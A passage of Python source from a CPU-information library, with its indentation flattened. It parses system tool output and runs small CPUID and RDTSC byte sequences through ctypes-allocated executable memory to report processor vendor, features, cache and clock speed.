value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
except:
#raise
pass
return (processor_brand, hz_brand, scale, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_string(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
processor_brand, hz_actual, scale, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
#print('FIELDS: ', (vendor_id, stepping, model, family))
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_actual'] = to_friendly_hz(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
info['hz_actual_raw'] = to_raw_hz(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def parse_arch(raw_arch_string):
arch, bits = None, None
raw_arch_string = raw_arch_string.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', raw_arch_string):
arch = 'X86_32'
bits = 32
elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', raw_arch_string):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^arm64$|^arm64[a-z]$|^arm64-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv8-a|aarch64$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', raw_arch_string):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', raw_arch_string):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', raw_arch_string):
arch = 'PPC_64'
bits = 64
# S390X
elif re.match('^s390x$', raw_arch_string):
arch = 'S390X'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', raw_arch_string):
arch = 'SPARC_32'
bits = 32
elif re.match('^sparc64$|^sun4u$|^sun4v$', raw_arch_string):
arch = 'SPARC_64'
bits = 64
return (arch, bits)
def is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = False
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = DataSource.sestatus_allow_execheap()
can_selinux_exec_memory = DataSource.sestatus_allow_execmem()
self.is_selinux_enforcing = (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# FIXME: We should not have to use different instructions to
# set eax to 0 or 1, on 32bit and 64bit machines.
def _zero_eax(self):
return (
b"\x31\xC0" # xor eax,eax
)
def _zero_ecx(self):
return (
b"\x31\xC9" # xor ecx,ecx
)
def _one_eax(self):
return (
b"\xB8\x01\x00\x00\x00" # mov eax,0x1"
)
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
self._zero_eax(),
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each 4bits is a ascii letter in the name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : is_bit_set(edx, 0),
'vme' : is_bit_set(edx, 1),
'de' : is_bit_set(edx, 2),
'pse' : is_bit_set(edx, 3),
'tsc' : is_bit_set(edx, 4),
'msr' : is_bit_set(edx, 5),
'pae' : is_bit_set(edx, 6),
'mce' : is_bit_set(edx, 7),
'cx8' : is_bit_set(edx, 8),
'apic' : is_bit_set(edx, 9),
#'reserved1' : is_bit_set(edx, 10),
'sep' : is_bit_set(edx, 11),
'mtrr' : is_bit_set(edx, 12),
'pge' : is_bit_set(edx, 13),
'mca' : is_bit_set(edx, 14),
'cmov' : is_bit_set(edx, 15),
'pat' : is_bit_set(edx, 16),
'pse36' : is_bit_set(edx, 17),
'pn' : is_bit_set(edx, 18),
'clflush' : is_bit_set(edx, 19),
#'reserved2' : is_bit_set(edx, 20),
'dts' : is_bit_set(edx, 21),
'acpi' : is_bit_set(edx, 22),
'mmx' : is_bit_set(edx, 23),
'fxsr' : is_bit_set(edx, 24),
'sse' : is_bit_set(edx, 25),
'sse2' : is_bit_set(edx, 26),
'ss' : is_bit_set(edx, 27),
'ht' : is_bit_set(edx, 28),
'tm' : is_bit_set(edx, 29),
'ia64' : is_bit_set(edx, 30),
'pbe' : is_bit_set(edx, 31),
'pni' : is_bit_set(ecx, 0),
'pclmulqdq' : is_bit_set(ecx, 1),
'dtes64' : is_bit_set(ecx, 2),
'monitor' : is_bit_set(ecx, 3),
'ds_cpl' : is_bit_set(ecx, 4),
'vmx' : is_bit_set(ecx, 5),
'smx' : is_bit_set(ecx, 6),
'est' : is_bit_set(ecx, 7),
'tm2' : is_bit_set(ecx, 8),
'ssse3' : is_bit_set(ecx, 9),
'cid' : is_bit_set(ecx, 10),
#'reserved3' : is_bit_set(ecx, 11),
'fma' : is_bit_set(ecx, 12),
'cx16' : is_bit_set(ecx, 13),
'xtpr' : is_bit_set(ecx, 14),
'pdcm' : is_bit_set(ecx, 15),
#'reserved4' : is_bit_set(ecx, 16),
'pcid' : is_bit_set(ecx, 17),
'dca' : is_bit_set(ecx, 18),
'sse4_1' : is_bit_set(ecx, 19),
'sse4_2' : is_bit_set(ecx, 20),
'x2apic' : is_bit_set(ecx, 21),
'movbe' : is_bit_set(ecx, 22),
'popcnt' : is_bit_set(ecx, 23),
'tscdeadline' : is_bit_set(ecx, 24),
'aes' : is_bit_set(ecx, 25),
'xsave' : is_bit_set(ecx, 26),
'osxsave' : is_bit_set(ecx, 27),
'avx' : is_bit_set(ecx, 28),
'f16c' : is_bit_set(ecx, 29),
'rdrnd' : is_bit_set(ecx, 30),
'hypervisor' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : is_bit_set(ebx, 1),
'sgx' : is_bit_set(ebx, 2),
'bmi1' : is_bit_set(ebx, 3),
'hle' : is_bit_set(ebx, 4),
'avx2' : is_bit_set(ebx, 5),
#'reserved' : is_bit_set(ebx, 6),
'smep' : is_bit_set(ebx, 7),
'bmi2' : is_bit_set(ebx, 8),
'erms' : is_bit_set(ebx, 9),
'invpcid' : is_bit_set(ebx, 10),
'rtm' : is_bit_set(ebx, 11),
'pqm' : is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : is_bit_set(ebx, 13),
'mpx' : is_bit_set(ebx, 14),
'pqe' : is_bit_set(ebx, 15),
'avx512f' : is_bit_set(ebx, 16),
'avx512dq' : is_bit_set(ebx, 17),
'rdseed' : is_bit_set(ebx, 18),
'adx' : is_bit_set(ebx, 19),
'smap' : is_bit_set(ebx, 20),
'avx512ifma' : is_bit_set(ebx, 21),
'pcommit' : is_bit_set(ebx, 22),
'clflushopt' : is_bit_set(ebx, 23),
'clwb' : is_bit_set(ebx, 24),
'intel_pt' : is_bit_set(ebx, 25),
'avx512pf' : is_bit_set(ebx, 26),
'avx512er' : is_bit_set(ebx, 27),
'avx512cd' : is_bit_set(ebx, 28),
'sha' : is_bit_set(ebx, 29),
'avx512bw' : is_bit_set(ebx, 30),
'avx512vl' : is_bit_set(ebx, 31),
'prefetchwt1' : is_bit_set(ecx, 0),
'avx512vbmi' : is_bit_set(ecx, 1),
'umip' : is_bit_set(ecx, 2),
'pku' : is_bit_set(ecx, 3),
'ospke' : is_bit_set(ecx, 4),
#'reserved' : is_bit_set(ecx, 5),
'avx512vbmi2' : is_bit_set(ecx, 6),
#'reserved' : is_bit_set(ecx, 7),
'gfni' : is_bit_set(ecx, 8),
'vaes' : is_bit_set(ecx, 9),
'vpclmulqdq' : is_bit_set(ecx, 10),
'avx512vnni' : is_bit_set(ecx, 11),
'avx512bitalg' : is_bit_set(ecx, 12),
#'reserved' : is_bit_set(ecx, 13),
'avx512vpopcntdq' : is_bit_set(ecx, 14),
#'reserved' : is_bit_set(ecx, 15),
#'reserved' : is_bit_set(ecx, 16),
#'mpx0' : is_bit_set(ecx, 17),
#'mpx1' : is_bit_set(ecx, 18),
#'mpx2' : is_bit_set(ecx, 19),
#'mpx3' : is_bit_set(ecx, 20),
#'mpx4' : is_bit_set(ecx, 21),
'rdpid' : is_bit_set(ecx, 22),
#'reserved' : is_bit_set(ecx, 23),
#'reserved' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
#'reserved' : is_bit_set(ecx, 26),
#'reserved' : is_bit_set(ecx, 27),
#'reserved' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
'sgx_lc' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : is_bit_set(ebx, 0),
'vme' : is_bit_set(ebx, 1),
'de' : is_bit_set(ebx, 2),
'pse' : is_bit_set(ebx, 3),
'tsc' : is_bit_set(ebx, 4),
'msr' : is_bit_set(ebx, 5),
'pae' : is_bit_set(ebx, 6),
'mce' : is_bit_set(ebx, 7),
'cx8' : is_bit_set(ebx, 8),
'apic' : is_bit_set(ebx, 9),
#'reserved' : is_bit_set(ebx, 10),
'syscall' : is_bit_set(ebx, 11),
'mtrr' : is_bit_set(ebx, 12),
'pge' : is_bit_set(ebx, 13),
'mca' : is_bit_set(ebx, 14),
'cmov' : is_bit_set(ebx, 15),
'pat' : is_bit_set(ebx, 16),
'pse36' : is_bit_set(ebx, 17),
#'reserved' : is_bit_set(ebx, 18),
'mp' : is_bit_set(ebx, 19),
'nx' : is_bit_set(ebx, 20),
#'reserved' : is_bit_set(ebx, 21),
'mmxext' : is_bit_set(ebx, 22),
'mmx' : is_bit_set(ebx, 23),
'fxsr' : is_bit_set(ebx, 24),
'fxsr_opt' : is_bit_set(ebx, 25),
'pdpe1gp' : is_bit_set(ebx, 26),
'rdtscp' : is_bit_set(ebx, 27),
#'reserved' : is_bit_set(ebx, 28),
'lm' : is_bit_set(ebx, 29),
'3dnowext' : is_bit_set(ebx, 30),
'3dnow' : is_bit_set(ebx, 31),
'lahf_lm' : is_bit_set(ecx, 0),
'cmp_legacy' : is_bit_set(ecx, 1),
'svm' : is_bit_set(ecx, 2),
'extapic' : is_bit_set(ecx, 3),
'cr8_legacy' : is_bit_set(ecx, 4),
'abm' : is_bit_set(ecx, 5),
'sse4a' : is_bit_set(ecx, 6),
'misalignsse' : is_bit_set(ecx, 7),
'3dnowprefetch' : is_bit_set(ecx, 8),
'osvw' : is_bit_set(ecx, 9),
'ibs' : is_bit_set(ecx, 10),
'xop' : is_bit_set(ecx, 11),
'skinit' : is_bit_set(ecx, 12),
'wdt' : is_bit_set(ecx, 13),
#'reserved' : is_bit_set(ecx, 14),
'lwp' : is_bit_set(ecx, 15),
'fma4' : is_bit_set(ecx, 16),
'tce' : is_bit_set(ecx, 17),
#'reserved' : is_bit_set(ecx, 18),
'nodeid_msr' : is_bit_set(ecx, 19),
#'reserved' : is_bit_set(ecx, 20),
'tbm' : is_bit_set(ecx, 21),
'topoext' : is_bit_set(ecx, 22),
'perfctr_core' : is_bit_set(ecx, 23),
'perfctr_nb' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
'dbx' : is_bit_set(ecx, 26),
'perftsc' : is_bit_set(ecx, 27),
'pci_l2i' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
#'reserved' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_kb' : ecx & 0xFF,
'line_size_b' : (ecx >> 12) & 0xF,
'associativity' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
def _actual_get_cpu_info_from_cpuid(queue):
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
queue.put(obj_to_b64({}))
return
# Return none if SE Linux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
queue.put(obj_to_b64({}))
return
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = to_hz_string(hz_actual)
# Get the Hz and scale
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : cpuid.get_vendor_id(),
'hardware' : '',
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
queue.put(obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_actual_get_cpu_info_from_cpuid, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return b64_to_obj(output)
except:
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = to_hz_string(hz_actual)
# Convert from GHz/MHz string to Hz
scale, hz_advertised = (0, None)
try:
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
except Exception:
pass
info = {
'hardware' : hardware,
'brand' : processor_brand,
'l3_cache_size' : to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if to_raw_hz(hz_advertised, scale) > (0, 0):
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
if to_raw_hz(hz_actual, scale) > (0, 0):
info['hz_actual'] = to_friendly_hz(hz_actual, 6)
info['hz_actual_raw'] = to_raw_hz(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
scale, hz_brand = 1, '0.0'
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
info = {
'hz_advertised' : to_friendly_hz(hz_brand, scale),
'hz_actual' : to_friendly_hz(hz_brand, scale),
'hz_advertised_raw' : to_raw_hz(hz_brand, scale),
'hz_actual_raw' : to_raw_hz(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = to_hz_string(new_hz)
scale = 6
info['hz_advertised'] = to_friendly_hz(new_hz, scale)
info['hz_actual'] = to_friendly_hz(new_hz, scale)
info['hz_advertised_raw'] = to_raw_hz(new_hz, scale)
